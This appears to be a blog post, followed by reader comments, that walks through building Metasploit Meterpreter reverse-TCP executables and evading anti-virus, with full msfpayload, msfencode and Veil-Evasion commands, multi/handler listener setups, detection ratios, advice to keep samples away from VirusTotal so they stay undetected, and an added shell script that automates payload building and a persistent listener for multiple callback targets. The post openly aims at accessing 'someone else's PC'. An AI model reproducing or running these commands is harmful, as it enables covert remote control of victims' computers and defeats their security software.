Generating Payloads & Anti-Virus Bypass Methods


Hi everyone… This article is about malicious stuff: how to create a payload, and how to connect to and listen for someone else's PC. Yes, all of that is possible with Metasploit or similar tools. It is also safe for you in the sense that you don't need to download any third-party stealer, keylogger or crypter; Meterpreter already provides that functionality 😉
Follow my steps…

My test machines: Windows 7 (in a virtual machine) and Windows 8
Local host IP: 10.34.0.62 (BackTrack 5 R3)
Local port: 4444

You can run msfpayload from inside msfconsole, or call it directly from the shell…


Method 1: No Encoding – Just the Payload    [ AV Detect Ratio = 74% ]

/opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 x > /root/Desktop/payload_1.exe

Or;

msfconsole
msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 x > /root/Desktop/payload_1.exe


It doesn't matter; both do the same thing. After generating the payload, we start a listener with multi/handler so the session is caught when the payload runs on the target. The handler's payload must be the same one the executable was built with. Here are the listen mode settings;

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.34.0.62
set LPORT 4444
exploit

or;

msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LHOST=10.34.0.62 LPORT=4444 E


After running it on the test machine…

Yes! We are in 😉
This method is highly detectable: a plain, unencoded msfpayload executable is flagged by most AV engines.
Here is the VirusTotal scanning result;
http://goo.gl/ql9qmp



Method 2: Encoding with msfencode   [ AV Detect Ratio = 74% ]

Metasploit already ships with encoders. You can list all of them with this command;

msfconsole
show encoders


I use the ones highlighted in yellow in the screenshot, x86/countdown and x86/shikata_ga_nai, chained so the output of the first pass is encoded again by the second 🙂

msfpayload windows/meterpreter/reverse_tcp LHOST=10.34.0.62 LPORT=4444 R | msfencode -e x86/countdown -c 2 -t raw | msfencode -t exe -e x86/shikata_ga_nai -c 2 > /root/Desktop/payload_2.exe


After running it on the test machine;


And we are in…
This method is still generally detectable by AV: the encoders exist to avoid bad characters, not to evade signatures, and the result is wrapped in the same well-known executable template, so the detection ratio stayed at 74%.
Here is the VirusTotal scanning result;
http://goo.gl/pB4Zaq



Method 3: Encoding with Veil-Framework   [ AV Detect Ratio = 0% ]

Veil-Evasion is a tool designed to generate Metasploit payloads that bypass common anti-virus solutions.
Setup & source: https://github.com/Veil-Framework/Veil-Evasion

Run;

python Veil-Evasion.py


My payload's settings (list shows the available payloads, and entering 20 selects payload number 20 from that list);

list
20
set LHOST 10.34.0.62
set LPORT 4444
set compile_to_exe Y
set use_pyherion Y
generate

After generating;

Now we can listen with multi/handler… And after running it on the test machine;


Veil-Framework generates powerful payloads, so don't submit samples to any online scanner that shares files with AV vendors, like VirusTotal; once a sample is distributed, the payload gets signatured quickly. (If you only need to know whether a file is already known, look up its hash instead of uploading the file.)
My preference is razorscanner.com or fuckingscan.me; they do not distribute any files.
Here is the scanning result;
http://goo.gl/t5Np3H



Method 4: Generate a 64-bit Payload   [ AV Detect Ratio = 3% or less ]

msfconsole
use payload/windows/x64/meterpreter/reverse_tcp
set LHOST 10.34.0.62
set LPORT 4444
set EXITFUNC process
generate -t exe -f /root/Desktop/payload_4_64bit.exe


Testing on my own machine, Windows 8 64-bit 🙂 … First open the listener and wait. The handler's payload has to match the executable, so this time set payload windows/x64/meterpreter/reverse_tcp instead of the 32-bit one used above;


Here is the VirScan scanning result;
http://goo.gl/ETgkQI
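The steps of Method 1 and Method 4 (generate the executable, then bring up a matching multi/handler) are easy to get wrong when you switch between the 32-bit and 64-bit payloads, because the handler silently fails to stage a session whose architecture does not match. The script below is an added example, not code from the original post or from the Metasploit project. It wraps those steps into reusable shell functions and adds a check the post does not show: it reads the Machine field from the PE header of the generated file and picks the handler payload from that. LHOST, LPORT and the paths are the post's own values; the msfconsole resource-script commands (use, set, ExitOnSession, exploit -j -z) are real msfconsole syntax; uppercase X is the exe output mode from msfpayload's usage text (the post uses lowercase x). The driver only calls msfpayload if it is on the PATH, so the PE check and the resource-script writer work on any box.

```shell
#!/bin/sh
# Added example, not code from the original post. Wraps the msfpayload +
# multi/handler steps into functions and adds a check the post does not show:
# read the PE Machine field of the generated .exe so the handler payload
# (x86 vs x64 meterpreter) matches it. Hostnames, ports and paths are the
# post's own values; msfpayload is only invoked if present.

LHOST=10.34.0.62
LPORT=4444

# Read the little-endian 16-bit value at byte offset $2 of file $1 (decimal).
# Prints 0 if the file is too short.
le16_at() {
    od -An -tu1 -j "$2" -N 2 "$1" 2>/dev/null |
        awk 'NR == 1 { v = $1 + $2 * 256 } END { print v + 0 }'
}

# Print x86 or x64 from the PE header's Machine field; "unknown" (status 1)
# for anything that is not a PE image.
pe_arch() {
    f=$1
    [ "$(od -An -tx1 -N 2 "$f" 2>/dev/null | tr -d ' ')" = "4d5a" ] ||
        { echo unknown; return 1; }                     # no "MZ" signature
    lo=$(le16_at "$f" 60); hi=$(le16_at "$f" 62)        # e_lfanew at 0x3c
    pe_off=$((lo + hi * 65536))
    sig=$(od -An -tx1 -j "$pe_off" -N 2 "$f" 2>/dev/null | tr -d ' ')
    [ "$sig" = "5045" ] || { echo unknown; return 1; }  # "PE"
    machine=$(le16_at "$f" $((pe_off + 4)))
    case $machine in
        332)   echo x86 ;;   # 0x014c IMAGE_FILE_MACHINE_I386
        34404) echo x64 ;;   # 0x8664 IMAGE_FILE_MACHINE_AMD64
        *)     echo unknown; return 1 ;;
    esac
}

# Map the architecture to the meterpreter payload the handler must be set to.
handler_payload_for() {
    case $1 in
        x86) echo windows/meterpreter/reverse_tcp ;;
        x64) echo windows/x64/meterpreter/reverse_tcp ;;
        *)   return 1 ;;
    esac
}

# Write an msfconsole resource script for the listener. ExitOnSession false
# plus "exploit -j -z" keeps the handler running as a background job, so
# several targets can call back to the same listener.
write_handler_rc() {
    payload=$1; lhost=$2; lport=$3; out=$4
    cat >"$out" <<EOF
use exploit/multi/handler
set PAYLOAD $payload
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Driver: build the payload with msfpayload (as in Method 1), verify its
# architecture from the PE header, and write a matching .rc next to it.
build_and_prepare() {
    payload=$1; exe=$2
    msfpayload "$payload" LHOST="$LHOST" LPORT="$LPORT" X > "$exe" || return 1
    arch=$(pe_arch "$exe") || { echo "not a PE image: $exe" >&2; return 1; }
    write_handler_rc "$(handler_payload_for "$arch")" "$LHOST" "$LPORT" "${exe%.exe}.rc"
    echo "$exe is $arch; start the listener with: msfconsole -r ${exe%.exe}.rc"
}

# Only run the driver when asked to and when msfpayload exists (the BackTrack box).
if [ "${1:-}" = run ] && command -v msfpayload >/dev/null 2>&1; then
    build_and_prepare windows/x64/meterpreter/reverse_tcp /root/Desktop/payload_4_64bit.exe
fi
```

Run it as sh payload_check.sh run on the attacking box; without the run argument it only defines the functions, so pe_arch can be pointed at any executable before you choose a handler. On current Metasploit, msfpayload and msfencode have been replaced by msfvenom, but the resource script and the architecture check are unchanged.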



Thank you d3nx for helping and inspiring.
Have fun hacking 🙂


4 thoughts on “Generating Payloads & Anti-Virus Bypass Methods”

    Somebody said:
    25 March 2014 at 13:46

    Thanks bro, nice article.

    MBE Jr said:
    11 April 2014 at 15:24

    An exemplary post.

    Coral said:
    18 April 2014 at 21:25

    Epic! This has my thumbs up for best 2014 post

    luke bryan tickets 2013 said:
    05 May 2014 at 09:05

    Hello from the USA! This was a terrific post and
    I appreciated reading it
